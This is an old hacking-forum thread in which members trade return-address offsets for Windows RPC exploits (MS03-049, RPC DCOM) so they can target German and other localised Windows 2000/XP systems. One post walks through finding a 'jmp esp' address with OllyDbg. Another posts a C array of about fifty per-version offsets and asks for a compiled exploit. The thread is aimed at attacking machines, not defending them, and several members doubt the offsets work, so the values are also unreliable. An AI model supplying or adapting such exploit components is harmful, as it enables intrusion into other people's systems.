Forums: Where Can I Find Other MS03049 Offsets? - Forums


Where Can I Find Other MS03049 Offsets? Need German Offsets

#1 Basti

  • Private First Class
  • Group: Members
  • Posts: 39
  • Joined: 02-September 03

Posted 22 November 2003 - 12:40 AM

Hi m8s, where can I find other offsets for the MS03049 exploit ( http://www.governmen...?showtopic=4352 ) << this one - or how can I find them out?

I'm interested in whether there are WORKING offsets for the other SPs and for all languages, and whether there are offsets for NTFS too, because this exploit is only for W2k SP4/SP1 English FAT32.


Can anybody help?


greetz basti

#2 Steffan

  • Private First Class
  • Group: Members
  • Posts: 66
  • Joined: 08-September 03

Posted 24 November 2003 - 02:23 PM

Maybe here you can find what you need, if they still have the const. kit to get offsets ...

http://www.m00.ru

C'ya

#3 barabas

  • Private First Class
  • Group: Members
  • Posts: 44
  • Joined: 01-September 03

Posted 27 November 2003 - 02:04 AM

To find the offset for your version:

Open services.exe with OllyDbg.
Select: View -> Executable modules.

Double-click user32.dll.

Right-click and search for the command jmp esp.

There you have the offset.

#4 pupkinvasya

  • Private First Class
  • Group: Members
  • Posts: 20
  • Joined: 29-November 03

Posted 30 November 2003 - 05:38 PM

see
Windows RPC DCOM Remote Exploit with 48 TARGETS

48 Targets -- 48 Offsets

#5 xaph

  • Private First Class
  • Group: Members
  • Posts: 23
  • Joined: 05-October 03

Posted 01 December 2003 - 06:47 AM

If someone is programming a 0349 exploit for German systems and Win2k, please post here or PM me.

greetz xapH

#6 barabas

  • Private First Class
  • Group: Members
  • Posts: 44
  • Joined: 01-September 03

Posted 01 December 2003 - 07:17 AM

Quote

see
Windows RPC DCOM Remote Exploit with 48 TARGETS

48 Targets -- 48 Offsets


hahaha...

You think you can use offsets from different DLLs for everything?? Good luck :D

#7 xaph

  • Private First Class
  • Group: Members
  • Posts: 23
  • Joined: 05-October 03

Posted 02 December 2003 - 12:33 AM

char winntsp4eng[] = "\xe5\x27\xf3\x77"; /* English winNT sp4 */
char winntsp5cn[] = "\xcf\xda\xee\x77"; /* china winNT sp5 */
char winntsp6cn[] = "\xac\x0e\xf0\x77"; /* china winNT sp6 */
char winntsp6acn[] = "\xc3\xea\xf0\x77"; /* china NT sp6a */
char win2knosppl[] = "\x4d\x3f\xe3\x77"; /* polish win2k nosp ver 5.00.2195*/
char win2ksp3pl[] = "\x29\x2c\xe4\x77"; /* polish win2k sp3 - ver 5.00.2195 tested */
char win2ksp4sp[] = "\x13\x3b\xa5\x77"; /* spanish win2k sp4 */
char win2knospeng1[] = "\x74\x16\xe8\x77"; /* english win2k nosp 1 */
char win2knospeng2[] = "\x6d\x3f\xe3\x77"; /* english win2k nosp 2 */
char win2ksp1eng[] = "\xec\x29\xe8\x77"; /* english win2k sp1 */
char win2ksp2eng1[] = "\x2b\x49\xe2\x77"; /* english win2k sp2 1 */
char win2ksp2eng2[] = "\xb5\x24\xe8\x77"; /* english win2k sp2 2 */
char win2ksp3eng1[] = "\x7a\x36\xe8\x77"; /* english win2k sp3 1 */
char win2ksp3eng2[] = "\x5c\xfa\x2e\x77"; /* english win2k sp3 2 */
char win2ksp4eng[] = "\x9b\x2a\xf9\x77"; /* english win2k sp4 */
char win2knospchi[] = "\x2a\xe3\xe2\x77"; /* china win2k nosp */
char win2ksp1chi[] = "\x8b\x89\xe6\x77"; /* china win2k sp1 */
char win2ksp2chi[] = "\x2b\x49\xe0\x77"; /* china win2k sp2 */
char win2ksp3chi[] = "\x44\x43\x42\x41"; /* china win2k sp3 */
char win2ksp4chi[] = "\x29\x4c\xdf\x77"; /* china win2k sp4 */
char win2ksp3ger[] = "\x7a\x88\x2e\x77"; /* german win2k sp3 */
char win2knospjap[] = "\xe5\x27\xf3\x77"; /* Japanese win2k nosp */
char win2ksp1jap[] = "\x8b\x89\xe5\x77"; /* Japanese win2k sp1 */
char win2ksp2jap[] = "\x2b\x49\xdf\x77"; /* japanese win2k sp2 */
char win2knospkr[] = "\x2a\xe3\xe1\x77"; /* Korea win2k nosp */
char win2ksp1kr[] = "\x8b\x89\xe5\x77"; /* Korea win2k sp1 same offset as win2kjp_sp1 ??*/
char win2ksp2kr[] = "\x2b\x49\xdf\x77"; /* Korea win2k sp2 */
char win2knospmx[] = "\x2a\xe3\xe1\x77"; /* Mexican win2k nosp */
char win2ksp1mx[] = "\x8b\x89\xe8\x77"; /* Mexican win2k sp1 */
char win2knospken[] = "\x4d\x3f\xe3\x77"; /* Kenya win2k sp1 */
char win2ksp1ken[] = "\x8b\x89\xe8\x77"; /* Kenya win2k sp1 */
char win2ksp2ken[] = "\x2b\x49\xe2\x77"; /* Kenya win2k sp1 */
char winxpnospeng[] = "\xe3\xaf\xe9\x77"; /* english xp nosp ver 5.1.2600 */
char winxpsp1eng1[] = "\xba\x26\xe6\x77"; /* english xp sp1 1 */
char winxpsp1eng2[] = "\xdb\x37\xd7\x77"; /* english xp sp1 2 */
char winxpsp2eng[] = "\xbd\x73\x7d\x77"; /* english xp sp2 */
char win2k3nospeng[] = "\xb0\x54\x22\x77"; /* english win2k3 */
char Win2ksp3ger[] = "\x29\x2c\xe3\x77"; /* German win2k sp3 */
char Win2ksp4ger1[] = "\x29\x4c\xe0\x77"; /* German win2k sp4 1 */
char Win2ksp4ger2[] = "\x56\xc2\xe2\x77"; /* German win2k sp4 2 */
char winxpsp1ger[] = "\xfc\x18\xd4\x77"; /* German xp sp1 */
char Win2ksp1fr[] = "\x4b\x3e\xe4\x77"; /* French win2k Server SP1 */
char Win2ksp4fr[] = "\x56\xc2\xe2\x77"; /* French win2k Server SP4 */
char winxpsp0fr[] = "\x4a\x75\xd4\x77"; /* French win xp no sp */
char winxpsp1fr[] = "\xfc\x18\xd4\x77"; /* French win xp sp 1 */
char win2ksp3big[] = "\x25\x2b\xaa\x77"; /* win2k sp3 (Big5) */
char win2ksp4big[] = "\x29\x4c\xdf\x77"; /* win2k sp4 (Big5) */
char winxpsp01big[] = "\xfb\x7b\xa1\x71"; /* win xp sp0/sp1 (Big5) */

Here you have all offsets from the 48-target exploit! Could you please send me a compiled version too, PM me or something; I can't compile the source for Windows because I don't have those libraries...

greetz XaPH

#8 320X

  • Master Sergeant
  • Group: Members
  • Posts: 473
  • Joined: 13-December 03

Posted 14 December 2003 - 04:34 PM

Mmm... good job xaph, I will test it, thanks for the post ;)

#9 Guest_teest_*

  • Group: Guests

Posted 15 December 2003 - 07:45 AM

Is that offset from DCOM 48 targets? It shouldn't work...

#10 Cyrus

  • Private First Class
  • Group: Members
  • Posts: 65
  • Joined: 15-December 03

Posted 15 December 2003 - 09:59 AM

Quote

To find the offset for your version:

Open services.exe with OllyDbg.
Select: View -> Executable modules.

Double-click user32.dll.

Right-click and search for the command jmp esp.

There you have the offset.


I did that, my results are:

Found commands, item 1
Address=77D4643D
Disassembly=JMP ESP

And I'm on Win XP Pro SP1 German.
